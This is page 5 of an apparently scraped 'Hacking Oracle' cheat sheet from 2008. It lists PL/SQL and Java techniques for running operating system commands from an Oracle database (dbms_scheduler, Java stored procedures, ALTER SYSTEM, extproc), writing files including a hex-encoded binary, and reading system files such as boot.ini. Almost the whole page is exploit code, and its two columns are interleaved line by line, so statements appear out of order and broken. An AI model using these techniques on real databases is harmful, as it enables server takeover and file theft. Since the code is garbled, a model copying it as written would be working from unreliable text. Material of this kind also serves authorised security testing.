Oracle Cheat Sheet Page 5
ADVERTISEMENT
1
2
3
4
5Hacking Oracle
–
-
Version 1.5.0 - 29-Jan-2008
Write Binary Files via utl_file:
Create or replace directory EXT as 'C:\’;
Run OS Commands via dbms_scheduler:
(10g/11g only)
-- Create a Program for dbms_scheduler
DECLARE fi UTL_FILE.FILE_TYPE; bu RAW(32767);
exec DBMS_SCHEDULER.create_program('RDS2008','EXECUTABLE','c:\
BEGIN
WINDOWS\system32\cmd.exe /c echo 0wned >> c:\rds3.txt',0,TRUE);
bu:=hextoraw('BF3B01BB8100021E8000B88200882780FB81750288D850E8060083
-- Create, execute and delete a Job for dbms_scheduler
C402CD20C35589E5B80100508D451A50B80F00508D5D00FFD383C40689EC5DC
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2008JOB',program_name
3558BEC8B5E088B4E048B5606B80040CD21730231C08BE55DC39048656C6C6F
=> 'RDS2008',start_date => NULL,repeat_interval => NULL,end_date =>
2C20576F726C64210D0A');
NULL,enabled => TRUE,auto_drop => TRUE);
fi:=UTL_FILE.fopen('EXT','','w',32767);
-- delete the program
UTL_FILE.put_raw(fi,bu,TRUE);
exec DBMS_SCHEDULER.drop_program(PROGRAM_NAME => 'RDS2008');
UTL_FILE.fclose(fi);
-- Purge the logfile for dbms_scheduler
END;
--exec DBMS_SCHEDULER.PURGE_LOG;
/
Write Text Files via utl_file:
Run OS Commands via Java:
(requires Java in the Database)
Create or replace directory EXT as 'C:\’;
grant javasyspriv to user1;
DECLARE
create or replace and resolce java source name "JAVACMD" AS
v_file UTL_FILE.FILE_TYPE;
import java.lang.*;
BEGIN
import java.io.*;
v_file := UTL_FILE.FOPEN('C:\','rds1.txt', 'w');
UTL_FILE.PUT_LINE(v_file,'first row');
public class JAVACMD
UTL_FILE.NEW_LINE (v_file);
{
UTL_FILE.PUT_LINE(v_file,'second row');
public static void execCommand (String command) throws IOException {
UTL_FILE.FCLOSE(v_file);
Runtime.getRuntime().exec(command);} };
END;
/
Write Text Files via dbms_advisor:
(10g/11g, requires the privilege advisor)
Create or replace procedure javacmdproc (p_command in varchar2)
Create or replace directory EXT as 'C:\’;
as language java
grant advisor to user1;
name 'JAVACMD.execCommand (java.lang.String)';
exec dbms_advisor.create_file ( 'hacked', EXT, 'rds2.txt' )
/
exec javacmdproc('cmd.exe /c echo 0wned > c:\rds4.txt');
Read Files via Java:
grant javasyspriv to user1;
Run OS Commands via ALTER SYSTEM & PL/SQL native:
(9i)
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" AS
alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds5.txt &';
import java.lang.*;
alter session set plsql_compiler_flags='NATIVE';
import java.io.*;
Create or replace procedure rds as begin null; end;
/
public class JAVAREADFILE{
public static void readfile(String filename) throws IOException{
FileReader f = new FileReader(filename);
Run OS Commands via Extproc
BufferedReader fr = new BufferedReader(f);
-- Since 9i extproc can only run DLLs from the Oracle_Home-Bin directory
String text = fr.readLine();;
-- copy the msvcrt.dll to this directory before executing this code
while(text != null){
Grant create any library to user1;
System.out.println(text);
Create or replace library exec_shell AS 'C:\oracle\ora102\bin\msvcrt.dll';
text = fr.readLine();
}
Create or replace package oracmd is procedure exec(cmdstring IN CHAR); end oracmd; /
fr.close();
}
Create or replace package body oracmd IS
};
procedure exec(cmdstring IN CHAR)
is external NAME "system"
CREATE OR REPLACE PROCEDURE JAVAREADFILEPROC (p_filename IN
library exec_shell LANGUAGE C;
VARCHAR2)
end oracmd;
AS LANGUAGE JAVA
/
NAME 'JAVAREADFILE.readfile (java.lang.String)';
exec oracmd.exec('cmd.exe /c echo 0wned > c:\rds7.txt');
/
set serveroutput on size 100000
exec dbms_java.set_output(2000);
exec JAVAREADFILEPROC('C:\boot.ini')
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education